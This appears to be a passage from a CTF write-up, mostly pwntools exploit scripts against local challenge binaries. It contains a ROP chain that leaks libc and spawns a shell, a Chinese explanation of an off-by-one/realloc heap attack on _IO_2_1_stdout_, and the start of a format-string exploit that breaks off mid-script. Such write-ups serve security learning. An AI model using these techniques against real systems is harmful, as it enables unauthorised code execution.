from pwn import * p = process("./pwn_printf") libc = ELF("./pwn_printf").libc p.recvuntil("You will find this game very interesting\n") #gdb.attach(p,'b *0x4007DF') for i in range(16): p.sendline(str(0x20)) puts_plt = 0x400640 puts_got = 0x603018 pop_rdi = 0x0000000000401213 p.send(p64(0x603500)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x4007DF)) libc_base = u64(p.recv(6)+'\x00\x00') - libc.sym['puts'] print hex(libc_base) #p.send("a"*0x8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x4007C6)) p.sendline("a"*0x8+p64(pop_rdi)+p64(libc_base+libc.search("/bin/sh").next())+p64(libc_base+libc.sym['system'])) p.interactive()
only_add
只有add功能,但是用的是realloc函数,size为0时即为free。
另外输入的时候可以off by one,修改size位可在下次申请到的时候溢出该堆块。
首先构造出unsortbin,并且利用off by one漏洞溢出修改其fd为_IO_2_1_stdout_,然后继续改另一tcache堆块fd到这里。
from pwn import * p = process("./blend_pwn") libc = ELF("./blend_pwn").libc defadd(data): p.recvuntil("Enter your choice >") p.sendline("2") p.recvuntil("input note:") p.sendline(data) deffree(idx): p.recvuntil("Enter your choice >") p.sendline("3") p.recvuntil("index>") p.sendline(str(idx)) defshow(): p.recvuntil("Enter your choice >") p.sendline("4") defshow_name(): p.recvuntil("Enter your choice >") p.sendline("1") defbackdoor(data): p.recvuntil("Enter your choice >") p.sendline("666") p.recvuntil("Please input what you want:") p.send(data) one = [0x45226,0x4527a,0xf0364,0xf1207] p.recvuntil("Please enter a name: ") p.sendline("%2$p")